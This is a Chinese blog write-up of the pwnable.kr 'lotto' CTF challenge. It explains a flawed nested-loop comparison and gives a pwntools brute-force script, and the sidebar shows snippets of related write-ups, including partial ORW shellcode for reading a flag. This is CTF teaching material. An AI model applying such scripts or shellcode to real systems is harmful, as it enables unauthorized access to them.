pwnable 笔记 Toddler's Bottle - lotto

最新推荐文章于 2020-02-27 19:28:10 发布
最新推荐文章于 2020-02-27 19:28:10 发布
阅读量1k 收藏
点赞数
分类专栏: pwn pwnable.kr 题解 文章标签: 随机 pwn 代码审计
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SmalOSnail/article/details/53257266
版权

这题考察审计代码的能力……题目中的for使用有误,导致猜对随机字符中字符的概率增大,可以用脚本暴破解题。

0

题目源码

1
2

题目分析

题目的关键代码如下:
for

首先生成一个了长度为6的由ASCII(1-45)组成的随机字符串lotto,然后用for循环逐个字符的比较我们输入的字符串submit与随机字符串lotto,当有6个字符完全相同时,打印flag。

这个比较操作的本意是比较submitlotto对应位置的6个字符,也就是说lotto的第一个字符和submit的第一个字符比较,lotto的第二个字符和submit的第二个字符比较……

但是这里用了两个for循环,比较操作变成了submit中的每一个字符分别与lotto中的每一个字符作比较,如果相等,则match++。也就是比较操作一共进行了6*6=36次,变量match的取值是0到36之间的一个数字。

最后只要match == 6就可以得到flag

解题思路

为了让match正好等于6,只需要用户输入六个相同字符即可

这样就有6*(1/44)的概率让match == 6

算了一下差不多有14%的概率猜对

虽说概率很大,但是手动地一次一次输入显得很low,于是写脚本解题,如下:
ok

解题脚本

    #!/usr/bin/python   

    from pwn import *  

    target = process("./lotto")  

    flag = 2  
    while flag:  
        s = target.readuntil("Exit\n")  
        if "bad" not in s:  
            print s  
            flag -= 1  
        target.sendline("1")  
        k = target.read()  
        target.sendline(chr(43)*6)  

    # run it in /tmp
TaQini852
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
pwnable.kr [Toddler's Bottle] - lotto
Re:Umiade.tr
03-22 803
Mommy! I made a lotto program for my homework. do you want to play? ssh lotto@pwnable.kr -p2222 (pw:guest) 同样是一个小游戏,考查…细心程度。源码如下:#include <stdio.h> #include <stdlib.h> #include <string.h> #incl
pwnable_orw 1
qq_46441427的博客
08-17 194
只能用read、open、write函数 那我们先open,然后read,最后write打印出来 from pwn import* p = remote('node4.buuoj.cn','25548') shellcode = asm('push 0x0;push 0x67616c66;mov ebx,esp;xor ecx,ecx;xor edx,edx;mov eax,0x5;int 0x80') shellcode += asm('mov eax,0x3;mov ecx,ebx;mov ebx
pwnable学习心得(一)
dezang2878的博客
02-17 239
前言:pwnable.kr这个学习网站是我学习pwn过程中主要肝的一个网站,因为要考研等种种原因没有办法继续肝题,写这个系列是希望对自己已经会了题进行一个总结,以及以我这种萌新的角度对题目的理解希望能帮助到各位初学者,有说的不对的地方还请多指教。 我理解的pwn是寻找服务器程序的漏洞,利用漏洞达到控制服务器的目的,在题目中体现为获取flag,因此我们需要做的事情有两件: 1.找...
pwnable.tw - orw
不急不躁
07-09 3028
简单概览 与 start 不同,该程序使用动态链接 提示仅允许有限的系统调用 open read write 函数 程序运行 哪怕是输入一个字母,程序仍然会出现段错误 检查安全措施 可见栈上开了 CANARY 程序 在 IDA 中反编译可见: 函数 orw_seccomp 反编译: 程序从终端读入内容,存放在 shellcode,然后执行该命令 ...
Lotto 迭代算法 cpp
matrixdodo
03-22 949
题目内容: 给定N个数字,再从中选定M个数字出来。 将每一种组合内的数字又小到大排列之后,将所有组合按照字典序排列, 请你找到第X组的第Y个数字。 给定的数字为1~N。 范例: 范例1: (N,M,X,Y) = (5,2,8,2) 所有组合按顺序排列为: (1 2), (1 3), (1 4), (1 5), (2 3), (2
Toddler-care-website:使用 Django 的互联网编程实验室迷你项目
08-04
在这个项目中,可能会有一个名为`toddler_care`的应用,包含了模型、视图、模板和静态文件。 3. **数据库模型**:在`models.py`文件中定义数据库模型,如`Nanny`(保姆)、`Product`(产品)和`Order`(订单)。...
Toddler Tap-开源
07-20
【 Toddler Tap 开源项目详解】 “Toddler Tap”是一个专为幼儿设计的开源软件,旨在激发孩子们对键盘和字母的初步认知。这个项目源于一个简单而温馨的观察:当小孩子们看到大人在电脑上敲击键盘时,他们通常会表现...
A Toddler Game-开源
05-26
至于“Toddler-windows”这个文件,很可能是游戏的Windows版本安装包或者执行文件。这意味着开发者已经为Windows用户提供了一个方便的执行版本,无需在Windows环境中自行编译源代码,简化了用户的使用流程。 总的来...
Kids Key - Alphabet Training for Toddler-开源
04-28
"Kids Key - Alphabet Training for Toddler" 是一款专为1至4岁孩子设计的开源软件,旨在通过字母和色彩的互动游戏,帮助孩子们轻松学习ABC和颜色识别,同时也为他们初步接触数字概念提供了趣味性的平台。...
toddler-ng:下一代Toddler,一款精心设计的可用便携式微内核操作系统
03-05
幼儿下一代幼儿主要目标用C99编写...并兼容多引导更多架构-OpenRISC,HPPA,SuperH,IA64,s390,VAX状态计划=尚未开始初始=初步探索活动=积极开发当前=最新拱目标装载机哈尔笔记ia32-pc-multiboot 当前的积极的需进行
HDU1342 Lotto 【深搜】
长风的专栏
06-02 1321
Lotto Time Limit: 2000/1000 MS (Java/Others)    Memory Limit: 65536/32768 K (Java/Others) Total Submission(s): 1411    Accepted Submission(s): 697 Problem Description In a Lotto I have eve
pwnable 题目解析:[Toddler's Bottle]-lotto 逻辑漏洞
个人笔记
02-27 356
0x10 题目描述 Mommy! I made a lotto program for my homework. do you want to play? ssh lotto@pwnable.kr -p2222 (pw:guest) 本题是 pwnable 中的入门级试题,代码本身不含漏洞,而是逻辑问题。时至今日,很多传统的堆栈溢出漏洞不再那么容易找到,而那些设计问题或者代码中的逻辑问题,往往...
pwnable.tw第一题start
计算机小白的博客
08-09 5577
这应该是我做的第一道pwn的题了(虽然也是看了很多别人的WriteUp),想了两天,才终于弄清楚了,在这里记录一下。拿到手以后发现是一个ELF文件,就放进kali虚拟机里面运行一下先: 程序启动以后打印一段话,然后让你输入,就完事了。 再放入IDA中,观察: 检测栈有点问题,不能够F5,强行看汇编。。。 5个push是打印出来的那句话, Let’s start the CTF: 下面一句
pwnable.kr】lotto - 彩票的中奖概率...
think_ycx的专栏
10-08 2658
lotto - 2 pt [writeup] Mommy! I made a lotto program for my homework. do you want to play? ssh lotto@pwnable.kr -p2222 (pw:guest) scp -P 2222 -p lotto@pwnable.kr:/home/lotto/* ./下载程序。 根据下载程序中的...
Lotto hdu1342
chen_minghui的博客
03-12 365
题意:输入一串长为n的数字串,从中选择6个数字按从大到小的顺序,排成一个序列,问有多少个不同的序列,并全部输出 题目链接:http://acm.hdu.edu.cn/showproblem.php?pid=1342 #include #include using namespace std; const int maxn = 16; int a[maxn],vis[maxn]; int n;
pwnable.kr记录
leeham的博客
08-25 595
pwnable.kr记录 fd col pof
lotto
jiuweideqixu的博客
02-10 432
Mommy! I made a lotto program for my homework. do you want to play? ssh lotto@pwnable.kr -p2222 (pw:guest) #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcn...
pwnablr.kr-lotto
r00tnb的博客
07-26 321
前言 又是一道很简单的源码阅读题目,考察思路。 分析 还是先分析源码 #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;string.h&gt; #include &lt;fcntl.h&gt; unsigned char submit[6]; void play(){ int i; ...
PEDA用法总结
热门推荐
HiTaQini
11-13 2万+
PEDA用法总结 一个强大的GDB插件  PEDA是为GDB设计的一个强大的插件,全称是Python Exploit Development Assistance for GDB。它提供了很多人性化的功能,比如高亮显示反汇编代码、寄存器、内存信息,提高了debug的效率。同时,PEDA还为GDB添加了一些实用新的命令,比如checksec可以查看程序开启了哪些安全机制等等,后续会介绍.
字符串["Baby","Toddler","Kids","Matching-Outfits","Maternity-Nursing","Licensed-Characters","Home-Baby-Gear","Shoes-Accessories"]转为java数组
最新发布
12-07
以下是将字符串["Baby","Toddler","Kids","Matching-Outfits","Maternity-Nursing","Licensed-Characters","Home-Baby-Gear","Shoes-Accessories"]转换为Java数组的代码示例: ```java String[] strArr = {"Baby",...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

TaQini852

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值